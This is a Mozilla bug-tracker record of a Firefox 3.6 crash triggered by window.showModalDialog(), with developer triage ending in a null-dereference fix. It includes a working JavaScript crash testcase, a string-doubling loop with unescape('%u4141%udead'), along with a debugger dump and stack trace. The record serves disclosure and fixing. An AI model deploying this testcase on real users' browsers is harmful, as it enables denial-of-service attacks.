Closed Bug 618240 Opened 15 years ago Closed 15 years ago

Crash Using window.showModalDialog() [null deref]

Categories

(Core :: General, defect)

Product:
Core
Component:
General
Version:
1.9.2 Branch
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
RESOLVED FIXED
Tracking Flags:
Tracking Status
status2.0 --- unaffected
status1.9.2 --- wanted

People

(Reporter: jordi.chancel, Assigned: jimm)

References

(
URL
)

Details

(Keywords: testcase, Whiteboard: [sg:dos][1.9.x branches, fixed on trunk in 557931] Related to window previews, which are now off by default.)

Attachments

(2 files, 3 obsolete files)

Testcase1
267 bytes, text/html
Details
Screenshot [Access Violation]
71.93 KB, image/png
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Visiting a webpage with a special javascript with some window.showModalDialog() Like : <body onload="javascript:crash();"></body> <script> function crash() { var string1 = unescape("%u4141%udead"); for (i =0;i<10000;i++) { string1+=string1+string1; window.showModalDialog(string1, string1, "dialogHeight:300px; dialogLeft:200px;"); } } </script> Reproducible: Always Steps to Reproduce: 1.Go to http://www.alternativ-testing.fr/Research/Mozilla/crash/showModalDialogcrash.htm Actual Results: Firefox Crashes with Access Violation 0:026> g (1a38.1ad8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=000000b4 ebx=00000000 ecx=00000000 edx=00000000 esi=00000002 edi=13292514 eip=6333d3f9 esp=005fd1a4 ebp=005fd1c8 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Mozilla Firefox\xul.dll - xul!Hunspell_get_dic_encoding+0x2070: 6333d3f9 8b00 mov eax,[eax] ds:002b:000000b4=????????
Attached file TestCase1 (obsolete) —
Attachment #496757 - Attachment is obsolete: true
Attached file Testcase1
Excuse me the perfect testcase is : <body onload="javascript:crash();"></body> <script> function crash() { var string1 = unescape("%u0000%udead"); for (i =0;i<10000;i++) { string1+=string1+string1; window.showModalDialog(string1, string1, "dialogHeight:300px; dialogLeft:200px;"); } } </script>
Allow Popup is needed
Screenshot [Access Violation]
Summary: Crash Using window.showModalDialog() [Access Violation] → Crash Using window.showModalDialog() and window.open() [Access Violation]
Attached file TestCase2 (window.open) (obsolete) —
Attached image ScreenShot [ACCESS_VIOLATION_WRITE] (obsolete) —
Attachment #496767 - Attachment is obsolete: true
Attachment #496768 - Attachment is obsolete: true
crash with window.open don't work now , but window.showModalDialog is well
Summary: Crash Using window.showModalDialog() and window.open() [Access Violation] → Crash Using window.showModalDialog() [Access Violation]
Keywords: testcase
The original crash is in hunspell, which we're already upgrading (bug 579649 and bug 620626). Is it a bug there or is that somewhat coincidental? If it's a spelling checker problem interspersed nulls--unescape("%u0000%udead")--might mask problems found by unescape("%u4141%udead"). Otherwise I tend to think the problem is the exponential string growth and not really anything to do with modal dialogs.
Whiteboard: [sg:critical?]
+0x2070 is too far to be the actual function, it could best past the edge of the hunspell library, but it probably isn't. however with WPO it might be possible for the general assumptions to be wrong.
tomcat/marcia, can you try to get a crash on this and post the stack trace. then we can take a stab at who to assign too.
Confirmed using Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 http://crash-stats.mozilla.com/report/index/44d19d00-27b5-40a6-ab6f-5334b2110104 Stack is the same as Bug 556524. Will check trunk next
Status: UNCONFIRMED → NEW
Ever confirmed: true
I don't get the crash using Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b9pre) Gecko/20110104 Firefox/4.0b9pre, but I have to force quit. Here is the stack from the 3.6. crash: Frame Module Signature [Expand] Source 0 xul.dll mozilla::widget::WindowHook::Lookup widget/src/windows/WindowHook.cpp:101 1 xul.dll mozilla::widget::WindowHook::LookupOrCreate widget/src/windows/WindowHook.cpp:109 2 xul.dll mozilla::widget::WindowHook::AddMonitor widget/src/windows/WindowHook.cpp:77 3 xul.dll mozilla::widget::TaskbarPreview::TaskbarPreview widget/src/windows/TaskbarPreview.cpp:107 4 xul.dll mozilla::widget::TaskbarTabPreview::TaskbarTabPreview widget/src/windows/TaskbarTabPreview.cpp:62 5 xul.dll mozilla::widget::WinTaskbar::CreateTaskbarTabPreview widget/src/windows/WinTaskbar.cpp:200 6 xul.dll NS_InvokeByIndex_P xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp:102 7 xul.dll XPCWrappedNative::CallMethod js/src/xpconnect/src/xpcwrappednative.cpp:2722 8 xul.dll XPC_WN_CallMethod js/src/xpconnect/src/xpcwrappednativejsops.cpp:1740 9 js3250.dll js_Invoke js/src/jsinterp.cpp:1360 10 js3250.dll js_Interpret js/src/jsops.cpp:2240 11 js3250.dll js_Invoke js/src/jsinterp.cpp:1368 12 js3250.dll js_InternalInvoke js/src/jsinterp.cpp:1423 13 js3250.dll JS_CallFunctionValue js/src/jsapi.cpp:5114 14 xul.dll nsJSContext::CallEventHandler dom/base/nsJSEnvironment.cpp:2197 15 xul.dll nsGlobalWindow::RunTimeout dom/base/nsGlobalWindow.cpp:8199 16 xul.dll nsGlobalWindow::TimerCallback dom/base/nsGlobalWindow.cpp:8533 17 xul.dll nsTimerImpl::Fire xpcom/threads/nsTimerImpl.cpp:427 18 xul.dll nsTimerEvent::Run xpcom/threads/nsTimerImpl.cpp:519 19 xul.dll nsThread::ProcessNextEvent xpcom/threads/nsThread.cpp:527 20 xul.dll NS_ProcessNextEvent_P obj-firefox/xpcom/build/nsThreadUtils.cpp:250 21 xul.dll nsXULWindow::ShowModal xpfe/appshell/src/nsXULWindow.cpp:416 22 xul.dll nsContentTreeOwner::ShowAsModal xpfe/appshell/src/nsContentTreeOwner.cpp:528 23 xul.dll nsWindowWatcher::OpenWindowJSInternal 24 xul.dll nsWindowWatcher::OpenWindow embedding/components/windowwatcher/src/nsWindowWatcher.cpp:425 25 xul.dll nsGlobalWindow::OpenInternal 26 xul.dll nsGlobalWindow::ShowModalDialog dom/base/nsGlobalWindow.cpp:6268 27 xul.dll NS_InvokeByIndex_P xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp:102 28 xul.dll XPCWrappedNative::CallMethod js/src/xpconnect/src/xpcwrappednative.cpp:2722 29 xul.dll XPC_WN_CallMethod js/src/xpconnect/src/xpcwrappednativejsops.cpp:1740 30 js3250.dll js_Invoke js/src/jsinterp.cpp:1360 31 js3250.dll js_Interpret js/src/jsops.cpp:2240 32 js3250.dll js_Invoke js/src/jsinterp.cpp:1368 33 js3250.dll js_InternalInvoke js/src/jsinterp.cpp:1423 34 js3250.dll JS_CallFunctionValue js/src/jsapi.cpp:5114 35 xul.dll nsJSContext::CallEventHandler dom/base/nsJSEnvironment.cpp:2197 36 xul.dll nsJSEventListener::HandleEvent dom/src/events/nsJSEventListener.cpp:269 37 xul.dll nsEventListenerManager::HandleEventSubType content/events/src/nsEventListenerManager.cpp:1041 38 xul.dll nsEventListenerManager::HandleEvent content/events/src/nsEventListenerManager.cpp:1147 39 xul.dll nsEventTargetChainItem::HandleEventTargetChain content/events/src/nsEventDispatcher.cpp:310 40 xul.dll nsEventDispatcher::Dispatch content/events/src/nsEventDispatcher.cpp:573 41 xul.dll DocumentViewerImpl::LoadComplete layout/base/nsDocumentViewer.cpp:1036 42 xul.dll nsDocShell::EndPageLoad docshell/base/nsDocShell.cpp:5714 43 xul.dll nsCOMPtr_base::assign_from_qi obj-firefox/xpcom/build/nsCOMPtr.cpp:98 44 xul.dll nsDocShell::OnStateChange docshell/base/nsDocShell.cpp:5586 45 xul.dll nsDocLoader::FireOnStateChange uriloader/base/nsDocLoader.cpp:1314 46 xul.dll nsDocLoader::doStopDocumentLoad uriloader/base/nsDocLoader.cpp:926 47 xul.dll nsDocLoader::DocLoaderIsEmpty uriloader/base/nsDocLoader.cpp:802 48 xul.dll nsDocLoader::OnStopRequest uriloader/base/nsDocLoader.cpp:697 49 xul.dll nsLoadGroup::RemoveRequest netwerk/base/src/nsLoadGroup.cpp:680 50 xul.dll xul.dll@0x985637 51 xul.dll nsDocument::UnblockOnload content/base/src/nsDocument.cpp:7119 52 xul.dll nsDocument::DispatchContentLoadedEvents content/base/src/nsDocument.cpp:4077 53 nspr4.dll PR_ExitMonitor nsprpub/pr/src/threads/prmon.c:132 54 xul.dll nsRunnableMethod<nsHttpChannel,void>::Run obj-firefox/dist/include/nsThreadUtils.h:282 55 xul.dll NS_ProcessNextEvent_P obj-firefox/xpcom/build/nsThreadUtils.cpp:250 56 xul.dll nsXULWindow::ShowModal xpfe/appshell/src/nsXULWindow.cpp:416 57 xul.dll nsContentTreeOwner::ShowAsModal xpfe/appshell/src/nsContentTreeOwner.cpp:528 58 xul.dll nsWindowWatcher::OpenWindowJSInternal
Keywords: stackwanted
status1.9.1: --- → ?
status1.9.2: --- → wanted
status2.0: --- → ?
Jim, can you look into this? Looks like windows widget code per Marcia's stack above.
Assignee: nobody → jmathies
blocking2.0: --- → betaN+
Window previews have been disabled by default, so this doesn't need to hard-block, and may not need to block at all.
status1.9.1: ? → ---
status2.0: ? → ---
Whiteboard: [sg:critical?] → [sg:critical?][softblocker] Related to window previews, which are now off by default.
This crash occurs in 3.6 only, with taskbar tab previews disabled. So it's important to fix, but I don't see why it's blocking the 4.0 release? It should be blocking a 1.9.2 release. Looks like one of our WindowsHook patches, or some other patch, fixed this on trunk. I'll see if I can track this down.
(In reply to comment #18) > This crash occurs in 3.6 only, with taskbar tab previews disabled. So it's > important to fix, but I don't see why it's blocking the 4.0 release? It should > be blocking a 1.9.2 release. > > Looks like one of our WindowsHook patches, or some other patch, fixed this on > trunk. I'll see if I can track this down. My mistake, it is only seen when previews are enabled, you just don't see them with this test case as they don't get created while it's running. The patch that fixes this is in bug 557931, I've requested approval there for 1.9.2.14.
Depends on: 557931
Removing betaN blocking status.
blocking2.0: betaN+ → ---
Nominating for 1.9.2 to ensure we track this. Thanks Jim!
blocking1.9.2: --- → ?
blocking1.9.2: ? → needed
status2.0: --- → unaffected
Whiteboard: [sg:critical?][softblocker] Related to window previews, which are now off by default. → [sg:critical?][1.9.x branches, fixed on trunk in 557931] Related to window previews, which are now off by default.
Version: unspecified → 1.9.2 Branch
The fix in bug 557931 is a null check, and the stack looks like a null deref (vtable+offset). I think I was over worried in comment 11 -- is there a vulnerability here?
Whiteboard: [sg:critical?][1.9.x branches, fixed on trunk in 557931] Related to window previews, which are now off by default. → [1.9.x branches, fixed on trunk in 557931] Related to window previews, which are now off by default.
Group: core-security
Whiteboard: [1.9.x branches, fixed on trunk in 557931] Related to window previews, which are now off by default. → [sg:dos][1.9.x branches, fixed on trunk in 557931] Related to window previews, which are now off by default.
fixed by bug 557931
Status: NEW → RESOLVED
Closed: 15 years ago
Resolution: --- → FIXED
Summary: Crash Using window.showModalDialog() [Access Violation] → Crash Using window.showModalDialog() [null deref]
blocking1.9.2: needed → ---
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: